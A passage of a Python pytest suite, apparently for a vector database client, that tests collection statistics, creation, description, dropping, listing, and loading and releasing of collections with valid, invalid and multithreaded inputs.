params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
log.info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: segment = []
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "CreateCollection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
log.info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L1)
def test_describe_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L1)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multi-thread
method: create and drop collection using multi-thread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test drop invalid collection
method: drop collection with empty or None collection name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test list collections with invalid scenario
method: show collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with no collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multi-threads
method: list collection using multi-threads
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L1)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_empty_collection(self, connect, collection):
"""
target: test load an empty collection with no data inserted
method: no entities in collection, load and release the collection
expected: load and release successfully
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load, release non-exist collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
